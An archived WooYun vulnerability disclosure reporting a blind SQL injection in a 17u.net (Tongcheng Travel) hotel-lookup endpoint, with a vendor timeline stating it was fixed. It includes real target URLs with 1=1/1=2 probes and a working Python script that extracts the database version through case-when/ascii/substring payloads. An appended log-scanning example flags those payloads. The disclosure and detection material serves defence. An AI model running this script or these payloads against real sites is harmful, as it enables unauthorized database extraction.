WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-05-04: Details have been sent to the vendor and are awaiting handling.
2015-05-04: The vendor has confirmed the issue; details are disclosed to the vendor only.
2015-05-07: The vendor has fixed the vulnerability and disclosed it proactively; details are now public.
SQL blind injection on one of the company's subsidiary sites.
1=1 returns data:
http://www.17u.net/ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53%20and(1=1)&lat=39.94831&lon=116.2933
1=2 returns no data:
http://www.17u.net/ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53%20and(1=2)&lat=39.94831&lon=116.2933
Verification script:
#coding=utf-8
# Python 2 script: boolean-based blind extraction of @@version, one character per thread
import sys
import urllib
import urllib2
from multiprocessing.dummy import Pool, Lock


def request(URL):
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, user_agent)
    try:
        resp = urllib2.urlopen(req, timeout=10)
    except Exception:
        return 'Runtime Error'
    return resp.read()


def binary_sqli(left, right, index):
    # Binary search over the ASCII range [left, right) for character `index` of @@version
    global result
    while 1:
        mid = (left + right) // 2
        if mid == left:
            # Interval has collapsed to a single value: record it and print progress
            lock.acquire()
            result[index - 1] = chr(mid)
            sys.stdout.write('\r%s' % '@@version: ' + ''.join(result))
            sys.stdout.flush()
            lock.release()
            break
        payload = "(case when (ascii(substring(@@version,%s,1))<%s) then 53 else 0 end)" % (index, mid)
        html = request('http://www.17u.net/ebookhandler/labelajax.ashx?action=gettejiahotel&lat=39.94831&lon=116.2933&cityid=' + urllib.quote(payload))
        # Image name that appears in the response only when cityid evaluates to 53 (condition true)
        verify = '8a1e3931bba8427eb6409a6d7e80a4ee.jpg'
        if verify in html:
            right = mid
        else:
            left = mid


def multi_run_wrapper(args):
    return binary_sqli(*args)


if __name__ == '__main__':
    result = list('*' * 80)
    lock = Lock()
    args = []
    for i in range(1, 80):
        args.append((32, 127, i))
    pool = Pool(5)
    out = pool.map(multi_run_wrapper, args)
    pool.close()
    pool.join()
You get the idea.
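From the defender's side, an added example (not part of the original report) of how the requests such a probe leaves in a web server access log can be spotted: it parses constructed Apache-style lines, percent-decodes the query string, and flags the 1=1/1=2 tautologies, the case-when/ascii/substring character probes, and any non-integer value in cityid. Treating cityid as integer-only is an assumption drawn from cityid=53 in the report.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed access-log lines (not from the report) showing the request shapes the
# boolean-based probe of cityid leaves behind: a baseline, 1=1/1=2, and a char probe.
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2015:10:01:02 +0800] "GET /ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53&lat=39.94831&lon=116.2933 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2015:10:01:07 +0800] "GET /ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53%20and(1=1)&lat=39.94831&lon=116.2933 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2015:10:01:09 +0800] "GET /ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53%20and(1=2)&lat=39.94831&lon=116.2933 HTTP/1.1" 200 318
203.0.113.5 - - [04/May/2015:10:02:00 +0800] "GET /ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=%28case%20when%20%28ascii%28substring%28%40%40version%2C1%2C1%29%29%3C79%29%20then%2053%20else%200%20end%29&lat=39.94831&lon=116.2933 HTTP/1.1" 200 5120
198.51.100.7 - - [04/May/2015:10:02:30 +0800] "GET /ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=21&lat=31.2&lon=121.5 HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d+ \d+')
NUMERIC_PARAMS = {"cityid"}  # assumption: the handler only expects an integer city id here
SIGNATURES = [
    ("tautology", re.compile(r"\band\s*\(?\s*1\s*=\s*[12]\s*\)?", re.I)),
    ("char-probe", re.compile(r"case\s+when.*ascii\s*\(\s*substring\s*\(", re.I | re.S)),
]


def inspect_request(line):
    """Return (client_ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qs percent-decodes values, so cityid=53%20and(1=1) is inspected as "53 and(1=1)"
    for name, values in parse_qs(urlparse(m.group("target")).query).items():
        for value in values:
            if name in NUMERIC_PARAMS and not value.strip().isdigit():
                findings.append(("type-violation", name, value))
            findings += [(label, name, value) for label, sig in SIGNATURES if sig.search(value)]
    return m.group("ip"), findings


def scan_log(text):
    """Group findings by client: one source sending 1=1/1=2 pairs and then ascii/substring
    probes is the shape of boolean-based blind extraction, not a stray typo."""
    by_client = defaultdict(list)
    for line in text.splitlines():
        parsed = inspect_request(line)
        if parsed and parsed[1]:
            by_client[parsed[0]].extend(parsed[1])
    return dict(by_client)
```

The type-violation check is the one that survives payload obfuscation: any value of cityid that is not a plain integer is wrong for this endpoint regardless of which SQL keywords it contains.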
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-05-04 12:38
Thank you for your attention to Tongcheng Travel (同程旅游).
2015-05-07: Fixed; we switched to a software WAF. Reporter, please reply with your contact details.